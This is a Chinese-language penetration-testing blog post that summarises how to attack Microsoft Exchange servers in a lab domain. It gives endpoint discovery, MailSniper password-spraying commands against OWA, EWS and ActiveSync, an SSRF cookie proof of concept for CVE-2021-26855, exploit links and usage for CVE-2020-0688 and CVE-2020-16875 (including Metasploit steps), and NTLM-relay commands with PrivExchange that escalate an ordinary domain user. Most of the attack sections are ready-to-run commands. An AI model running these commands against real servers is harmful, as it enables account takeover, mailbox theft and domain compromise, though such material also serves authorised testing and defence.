<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"blog.rizhan.icu","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="前言实验环境：DC (10.10.10.10)  windows server 2012 R2 Exchange Server（10.10.10.40）windows server 2012 R2  Exchange 2016 CU18  辅助DC (10.10.10.20) 攻击机IP (10.10.10.142)  域：c0okb.cn（域用户：&amp;#116;&amp;#x65;&amp;#x73;&amp;#116;">
<meta property="og:type" content="article">
<meta property="og:title" content="Exchange渗透总结">
<meta property="og:url" content="https://blog.rizhan.icu/2021/08/06/Exchange%E6%B8%97%E9%80%8F%E6%80%BB%E7%BB%93/index.html">
<meta property="og:site_name" content="奇安信Z-Team技术博客">
<meta property="og:description" content="前言实验环境：DC (10.10.10.10)  windows server 2012 R2 Exchange Server（10.10.10.40）windows server 2012 R2  Exchange 2016 CU18  辅助DC (10.10.10.20) 攻击机IP (10.10.10.142)  域：c0okb.cn（域用户：&amp;#116;&amp;#x65;&amp;#x73;&amp;#116;">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/1.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/2.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/17.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/18.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/16.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/11.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/3.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/4.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/5.PNG">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/6.PNG">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/7.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/8.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/23.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/24.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/9.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/12.PNG">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/13.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/14.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/15.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/19.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/20.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/21.png">
<meta property="og:image" content="https://blog.rizhan.icu/attach/image/22.png">
<meta property="article:published_time" content="2021-08-06T13:40:35.000Z">
<meta property="article:modified_time" content="2021-08-09T03:15:08.462Z">
<meta property="article:author" content="QAX Z-Team">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://blog.rizhan.icu/attach/image/1.png">

<link rel="canonical" href="https://blog.rizhan.icu/2021/08/06/Exchange%E6%B8%97%E9%80%8F%E6%80%BB%E7%BB%93/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>Exchange渗透总结 | 奇安信Z-Team技术博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">奇安信Z-Team技术博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">技术源于分享，但不止于分享</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://blog.rizhan.icu/2021/08/06/Exchange%E6%B8%97%E9%80%8F%E6%80%BB%E7%BB%93/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="QAX Z-Team">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="奇安信Z-Team技术博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Exchange渗透总结
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-08-06 21:40:35" itemprop="dateCreated datePublished" datetime="2021-08-06T21:40:35+08:00">2021-08-06</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2021-08-09 11:15:08" itemprop="dateModified" datetime="2021-08-09T11:15:08+08:00">2021-08-09</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>实验环境：DC (10.10.10.10)  windows server 2012 R2</p>
<p>Exchange Server（10.10.10.40）windows server 2012 R2  Exchange 2016 CU18 </p>
<p>辅助DC (10.10.10.20)</p>
<p>攻击机IP (10.10.10.142) </p>
<p>域：c0okb.cn（域用户：<a href="mailto:&#116;&#x65;&#x73;&#116;&#x4d;&#101;&#109;&#98;&#x65;&#114;&#64;&#99;&#x30;&#111;&#107;&#98;&#x2e;&#x63;&#x6e;">&#116;&#x65;&#x73;&#116;&#x4d;&#101;&#109;&#98;&#x65;&#114;&#64;&#99;&#x30;&#111;&#107;&#98;&#x2e;&#x63;&#x6e;</a>，<a href="mailto:&#x61;&#100;&#x6d;&#x69;&#110;&#x69;&#115;&#116;&#114;&#97;&#116;&#x6f;&#x72;&#x40;&#x63;&#x30;&#x6f;&#x6b;&#x62;&#46;&#99;&#x6e;">&#x61;&#100;&#x6d;&#x69;&#110;&#x69;&#115;&#116;&#114;&#97;&#116;&#x6f;&#x72;&#x40;&#x63;&#x30;&#x6f;&#x6b;&#x62;&#46;&#99;&#x6e;</a>）</p>
<span id="more"></span>

<h1 id="发现Exchange"><a href="#发现Exchange" class="headerlink" title="发现Exchange"></a>发现Exchange</h1><h2 id="端口扫描探测"><a href="#端口扫描探测" class="headerlink" title="端口扫描探测"></a>端口扫描探测</h2><p><img src="/attach/image/1.png" alt="image-20210803172815811"></p>
<p><img src="/attach/image/2.png" alt="image-20210803172933492"></p>
<h2 id="特殊后缀"><a href="#特殊后缀" class="headerlink" title="特殊后缀"></a>特殊后缀</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">https://ServerAddress/AutoDiscover/  该接口能用于爆破账号密码</span><br><span class="line">用于自动配置用户在Outlook中邮箱的相关设置，简化用户登陆使用邮箱的流程</span><br><span class="line"></span><br><span class="line">https://ServerAddress/Ecp/  </span><br><span class="line">管理员用于管理组织中的Exchange的Web控制台</span><br><span class="line"></span><br><span class="line">https://ServerAddress/EWS/  该接口能用于爆破账号密码</span><br><span class="line">实现客户端与服务端之间基于HTTP的SOAP交互</span><br><span class="line"></span><br><span class="line">https://ServerAddress/mapi/</span><br><span class="line"></span><br><span class="line">https://ServerAddress/Microsoft-Server-ActiveSync/  该接口能用于爆破账号密码</span><br><span class="line">用于移动应用程序访问电子邮件</span><br><span class="line"></span><br><span class="line">https://ServerAddress/OAB/</span><br><span class="line">用于为Outlook客户端提供地址簿的副本，减轻Exchange的负担</span><br><span class="line"></span><br><span class="line">https://ServerAddress/OWA/ 该接口能用于爆破账号密码</span><br><span class="line">用于通过web应用程序访问邮件、日历、任务和联系人等</span><br><span class="line"></span><br><span class="line">https://ServerAddress/PowerShell/</span><br><span class="line">用于服务器管理的Exchange管理控制台</span><br><span class="line"></span><br><span class="line">https://ServerAddress/Rpc/  </span><br></pre></td></tr></table></figure>

<p>其中能用于账号密码爆破：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">/AutoDiscover/</span><br><span class="line">/EWS/</span><br><span class="line">/OWA/</span><br><span class="line">/Rpc/ </span><br></pre></td></tr></table></figure>

<h2 id="特殊域名"><a href="#特殊域名" class="headerlink" title="特殊域名"></a>特殊域名</h2><p>通过一些特殊的子域名在互联网中发现Exchange服务器</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">https://autodiscover.domain.com/autodiscover/autodiscover.xml</span><br><span class="line">https://owa.domian/owa/</span><br><span class="line">https://mail.domain.com/</span><br><span class="line">https://webmail.domain.com/</span><br></pre></td></tr></table></figure>

<h2 id="查看Exchange版本"><a href="#查看Exchange版本" class="headerlink" title="查看Exchange版本"></a>查看Exchange版本</h2><p>在outlook界面查看源代码，通过查看link标签中的数字与链接</p>
<p><img src="/attach/image/17.png" alt="image-20210805013029075"></p>
<p>通过其中的数字与官方的内部版本号进行对比即可判断版本。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://docs.microsoft.com/zh-cn/Exchange/new-features/build-numbers-and-release-dates?view=exchserver-2019</span><br></pre></td></tr></table></figure>

<p><img src="/attach/image/18.png" alt="image-20210805013403796"></p>
<h1 id="Exchange账号密码爆破"><a href="#Exchange账号密码爆破" class="headerlink" title="Exchange账号密码爆破"></a>Exchange账号密码爆破</h1><p>在Exchange服务中，以下几个接口可以用于账号密码的爆破</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">/AutoDiscover/</span><br><span class="line">/EWS/</span><br><span class="line">/OWA/</span><br><span class="line">/Microsoft-Server-ActiveSync/</span><br></pre></td></tr></table></figure>

<h2 id="收集邮箱信息"><a href="#收集邮箱信息" class="headerlink" title="收集邮箱信息"></a>收集邮箱信息</h2><p>工具：<a target="_blank" rel="noopener" href="https://github.com/dafthack/MailSniper">MailSniper</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Import-Module .\MailSniper.ps1</span><br><span class="line">Get-GlobalAddressList -ExchHostname 10.10.10.40 -UserName c0okb.cn\testMember -Password Buzhidao250. -OutFile out.txt</span><br></pre></td></tr></table></figure>

<p><img src="/attach/image/16.png" alt="image-20210805012434745"></p>
<h2 id="利用AutoDiscover接口进行密码爆破"><a href="#利用AutoDiscover接口进行密码爆破" class="headerlink" title="利用AutoDiscover接口进行密码爆破"></a>利用AutoDiscover接口进行密码爆破</h2><p>工具：<a target="_blank" rel="noopener" href="https://github.com/sensepost/ruler">Ruler</a></p>
<p>利用该接口，可以对邮箱账号密码进行爆破。利用工具Ruler对该接口进行认证的暴力破解，该工具可以配置线程数、间隔时间可以限制破解速度防止多次登陆失败触发告警或账户被封禁。</p>
<p><img src="/attach/image/11.png" alt="image-20210804194701949"></p>
<h2 id="利用owa接口进行密码爆破"><a href="#利用owa接口进行密码爆破" class="headerlink" title="利用owa接口进行密码爆破"></a>利用owa接口进行密码爆破</h2><p>工具：MailSniper</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Invoke-PasswordSprayOWA</span> <span class="literal">-ExchHostname</span> <span class="number">10.10</span>.<span class="number">10.40</span> <span class="literal">-UserList</span> .\user.txt <span class="literal">-Password</span> <span class="number">1</span>qaz@WSX <span class="literal">-Threads</span> <span class="number">1</span> <span class="literal">-Domain</span> c0okb.cn <span class="literal">-OutFile</span> out.txt <span class="literal">-Verbose</span></span><br></pre></td></tr></table></figure>

<p><img src="/attach/image/3.png" alt="image-20210804104818435"></p>
<h2 id="利用ews接口进行密码爆破"><a href="#利用ews接口进行密码爆破" class="headerlink" title="利用ews接口进行密码爆破"></a>利用ews接口进行密码爆破</h2><p>工具：MailSniper</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Invoke-PasswordSprayEWS</span> <span class="literal">-ExchHostname</span> <span class="number">10.10</span>.<span class="number">10.40</span> <span class="literal">-UserList</span> .\user.txt <span class="literal">-Password</span> <span class="number">1</span>qaz@WSX <span class="literal">-Threads</span> <span class="number">1</span> <span class="literal">-Domain</span> c0okb.cn <span class="literal">-OutFile</span> out.txt <span class="literal">-Verbose</span></span><br></pre></td></tr></table></figure>

<p><img src="/attach/image/4.png" alt="image-20210804105821714"></p>
<h2 id="利用Microsoft-Server-ActiveSync接口进行密码爆破"><a href="#利用Microsoft-Server-ActiveSync接口进行密码爆破" class="headerlink" title="利用Microsoft-Server-ActiveSync接口进行密码爆破"></a>利用<strong>Microsoft-Server-ActiveSync</strong>接口进行密码爆破</h2><p>工具：MailSniper</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Invoke-PasswordSprayEAS -ExchHostname 10.10.10.40 -UserList .\user.txt -Password 1qaz@WSX -Threads 1 -Domain c0okb.cn -OutFile out.txt -Verbose</span><br></pre></td></tr></table></figure>

<p><img src="/attach/image/5.PNG" alt="image-20210804110312558"></p>
<h1 id="Exchange-历史漏洞总结"><a href="#Exchange-历史漏洞总结" class="headerlink" title="Exchange 历史漏洞总结"></a>Exchange 历史漏洞总结</h1><h2 id="CVE-2021-34473"><a href="#CVE-2021-34473" class="headerlink" title="CVE-2021-34473"></a>CVE-2021-34473</h2><p>Microsoft Exchange Server存在远程执行代码漏洞，未经身份验证的远程攻击者向服务器发送精心构造的请求，可在目标服务器上执行任意代码。</p>
<p>影响版本：</p>
<p>Microsoft Exchange Server 2019 Cumulative Update 9</p>
<p>Microsoft Exchange Server 2013 Cumulative Update 23</p>
<p>Microsoft Exchange Server 2019 Cumulative Update 8</p>
<p>Microsoft Exchange Server 2016 Cumulative Update 19</p>
<p>Microsoft Exchange Server 2016 Cumulative Update 20</p>
<p>PS: 未有公开完整的EXP</p>
<p>参考文章：</p>
<p><a target="_blank" rel="noopener" href="https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/">https://devco.re/blog/2021/08/06/a-new-attack-surface-on-MS-exchange-part-1-ProxyLogon/</a></p>
<p><a target="_blank" rel="noopener" href="https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1">https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1</a></p>
<h2 id="CVE-2021-28482"><a href="#CVE-2021-28482" class="headerlink" title="CVE-2021-28482"></a>CVE-2021-28482</h2><p>影响版本：</p>
<p>Microsoft Exchange Server 2019 Cumulative Update 8</p>
<p>Microsoft Exchange Server 2019 Cumulative Update 9</p>
<p>Microsoft Exchange Server 2016 Cumulative Update 19</p>
<p>Microsoft Exchange Server 2016 Cumulative Update 20</p>
<p>Microsoft Exchange Server 2013 Cumulative Update 23</p>
<p>利用条件：需要一个普通账户</p>
<p>测试版本：Exchange Server 2016 CU12 (失败)</p>
<p>EXP<br><a target="_blank" rel="noopener" href="https://gist.github.com/testanull/9ebbd6830f7a501e35e67f2fcaa57bda">https://gist.github.com/testanull/9ebbd6830f7a501e35e67f2fcaa57bda</a></p>
<p>可参考链接：</p>
<p><a target="_blank" rel="noopener" href="https://testbnull.medium.com/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482-e713001d915f">https://testbnull.medium.com/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482-e713001d915f</a></p>
<p><a target="_blank" rel="noopener" href="https://www.youtube.com/watch?v=2ludXDGfOlQ">https://www.youtube.com/watch?v=2ludXDGfOlQ</a></p>
<p>PS: 在复现过程中用github的现有工具<a target="_blank" rel="noopener" href="https://gist.github.com/testanull/9ebbd6830f7a501e35e67f2fcaa57bda">testanull</a>，复现失败，此处存疑，可能是版本问题，或者工具自身问题，待研究。</p>
<h2 id="CVE-2021-26855"><a href="#CVE-2021-26855" class="headerlink" title="CVE-2021-26855"></a>CVE-2021-26855</h2><p>影响版本：</p>
<p>Microsoft Exchange 2013</p>
<p>Microsoft Exchange 2016 cu18</p>
<p>Microsoft Exchange 2019</p>
<p>Microsoft Exchange 2010</p>
<p>介绍：该漏洞是Exchange中的服务端请求伪造漏洞（SSRF），利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证，远程未授权的攻击者可以利用该漏洞以进行内网探测，并可以用于窃取用户邮箱的全部内容。</p>
<p>利用路径</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">/owa/auth/x.js　</span><br><span class="line">/owa/auth/Current/themes/resources/logon.css</span><br><span class="line">/owa/auth/Current/themes/resources/...</span><br><span class="line">/ecp/default.flt</span><br><span class="line">/ecp/main.css</span><br><span class="line">/ecp/&lt;single char&gt;.js</span><br></pre></td></tr></table></figure>

<p>POC</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Cookie: X-AnonResource=true; X-AnonResource-Backend=*******/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;</span><br></pre></td></tr></table></figure>

<p><img src="/attach/image/6.PNG" alt="image-20210804153813036"></p>
<p>仅仅是SSRF不太行，结合CVE-2021-27065可以达到RCE的效果，</p>
<p>CVE-2021-27065：该漏洞是Exchange中的任意文件写入漏洞。该漏洞需要进行身份认证，利用此漏洞可以将文件写入服务器上的任何路径。并可以结合利用CVE-2021-26855 SSRF漏洞或绕过权限认证进行文件写入。</p>
<p>EXP: <a target="_blank" rel="noopener" href="https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Exchange/CVE-2021-26855%20Exchange%20RCE/exp.py">https://github.com/mai-lang-chai/Middleware-Vulnerability-detection/blob/master/Exchange/CVE-2021-26855%20Exchange%20RCE/exp.py</a></p>
<p><img src="/attach/image/7.png" alt="image-20210804165537533"></p>
<p><img src="/attach/image/8.png" alt="image-20210804165615375"></p>
<h2 id="CVE-2020-17144"><a href="#CVE-2020-17144" class="headerlink" title="CVE-2020-17144"></a>CVE-2020-17144</h2><p>影响版本：</p>
<p>Microsoft Exchange 2010 SP3 update Rollup 31</p>
<p>利用条件：需要一个普通账号</p>
<p>EXP1： <a target="_blank" rel="noopener" href="https://github.com/Airboi/CVE-2020-17144-EXP">https://github.com/Airboi/CVE-2020-17144-EXP</a></p>
<p><img src="/attach/image/23.png" alt="image-20210806185334505"></p>
<p><img src="/attach/image/24.png" alt="image-20210806185426622"></p>
<p>EXP2：<a target="_blank" rel="noopener" href="https://github.com/zcgonvh/CVE-2020-17144">https://github.com/zcgonvh/CVE-2020-17144</a></p>
<h2 id="CVE-2020-16875"><a href="#CVE-2020-16875" class="headerlink" title="CVE-2020-16875"></a>CVE-2020-16875</h2><p>漏洞描述：远程攻击者通过构造特殊的cmdlet参数，可造成任意命令执行。</p>
<p>影响版本：</p>
<p>Microsoft Exchange 2016 cu 16/17</p>
<p>Microsoft Exchange 2019 cu 5/6</p>
<p>利用条件：需要一个普通账号</p>
<h3 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h3><p>POC：<a target="_blank" rel="noopener" href="https://srcincite.io/pocs/cve-2020-16875.py.txt">https://srcincite.io/pocs/cve-2020-16875.py.txt</a></p>
<p><img src="/attach/image/9.png" alt="image-20210804175553431"></p>
<h3 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h3><p>MSF漏洞利用</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line"></span><br><span class="line">搜索模块</span><br><span class="line">search exchange 或者 CVE-2020-16875</span><br><span class="line"></span><br><span class="line">进入渗透模块</span><br><span class="line">use exploit/windows/http/exchange_ecp_dlp_policy</span><br><span class="line"></span><br><span class="line">查看详细</span><br><span class="line">msf6 exploit(windows/http/exchange_ecp_dlp_policy) &gt; info</span><br><span class="line"></span><br><span class="line">查看</span><br><span class="line">show options</span><br><span class="line"></span><br><span class="line">输入攻击信息</span><br><span class="line">set RHOSTS 206.201.40.96</span><br><span class="line"></span><br><span class="line">set USERNAME Administrator</span><br><span class="line"></span><br><span class="line">set PASSWORD assw0rd!</span><br><span class="line"></span><br><span class="line">set LHOST 206.201.40.96</span><br><span class="line"></span><br><span class="line">开始攻击</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<h2 id="CVE-2020-0688"><a href="#CVE-2020-0688" class="headerlink" title="CVE-2020-0688"></a>CVE-2020-0688</h2><p>漏洞描述：当攻击者通过各种手段获得一个可以访问Exchange Control Panel （ECP）组件的用户账号密码，就可以在被攻击的exchange上执行任意代码，直接获取服务器权限。</p>
<p>影响版本：</p>
<p>Microsoft Exchange 2010 SP3 update Rollup 30</p>
<p>Microsoft Exchange 2013 cu 23</p>
<p>Microsoft Exchange 2016 cu 14/15</p>
<p>Microsoft Exchange 2019 cu 3/4</p>
<p>利用条件：需要有一个普通用户账号</p>
<p>利用工具：<a target="_blank" rel="noopener" href="https://github.com/Ridter/cve-2020-0688">https://github.com/Ridter/cve-2020-0688</a></p>
<p>执行EXP如下：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 cve-2020-0688.py -s https://192.168.111.182/owa/ -u administrator@c0okb.cn -p xxxxxxxx -c calc</span><br></pre></td></tr></table></figure>

<p><img src="/attach/image/12.PNG" alt="image-20210805010106317"></p>
<p>工具：<a target="_blank" rel="noopener" href="https://github.com/pwntester/ysoserial.net/releases/tag/v1.33">https://github.com/pwntester/ysoserial.net/releases/tag/v1.33</a></p>
<p>运行ysoserial.exe</p>
<p><img src="/attach/image/13.png" alt="image-20210805004013026"></p>
<p>生成的payload，在python脚本中回车，返回500</p>
<p><img src="/attach/image/14.png" alt="image-20210805010215849"></p>
<p>命令执行成功</p>
<p><img src="/attach/image/15.png" alt="image-20210805004647785"></p>
<h1 id="Exchange内网利用"><a href="#Exchange内网利用" class="headerlink" title="Exchange内网利用"></a>Exchange内网利用</h1><h2 id="CVE-2018-8581"><a href="#CVE-2018-8581" class="headerlink" title="CVE-2018-8581"></a>CVE-2018-8581</h2><p>这个漏洞利用一个可以正常登入的普通用户账户，通过ssrf调用Exchange Server凭证到已控制的内网服务器上，并默认Exchange Server权限较高，就达到了提权的目的。</p>
<p>影响版本：</p>
<p>Exchange Server 2010  </p>
<p>Exchange Server 2013</p>
<p>Exchange Server 2016</p>
<p>PS:在测试过程中，发现累计更新版本过高的没法打，影响版本此次存疑</p>
<h3 id="方法一-1"><a href="#方法一-1" class="headerlink" title="方法一"></a>方法一</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo python2 Exchange2domain.py -ah <span class="number">10.10</span><span class="number">.10</span><span class="number">.139</span> -ap <span class="number">80</span> -u testMember -p <span class="string">&quot;Buzhidao250.&quot;</span> -d c0okb.cn -th <span class="number">10.10</span><span class="number">.10</span><span class="number">.10</span> <span class="number">10.10</span><span class="number">.10</span><span class="number">.40</span></span><br></pre></td></tr></table></figure>

<h3 id="方法二-1"><a href="#方法二-1" class="headerlink" title="方法二"></a>方法二</h3><p>利用工具：<a target="_blank" rel="noopener" href="https://github.com/dirkjanm/PrivExchange">Privexchange</a>，一个普通的用户账号密码</p>
<p>攻击者开启NTLM中继</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo python3 ntlmrelayx.py -t ldap://10.10.10.10 --escalate-user testMember</span><br></pre></td></tr></table></figure>

<p>攻击Exchange服务器，发起SSRF攻击，调用Exchange凭据到目标服务器</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo python2 privexchange.py -ah <span class="number">10.10</span><span class="number">.10</span><span class="number">.139</span> exchange.c0okb.cn -u testMember -p <span class="string">&quot;Buzhidao250.&quot;</span> -d c0okb.cn --no-ssl --debug    </span><br></pre></td></tr></table></figure>

<p>回调凭证信息到攻击者服务器，读取信息</p>
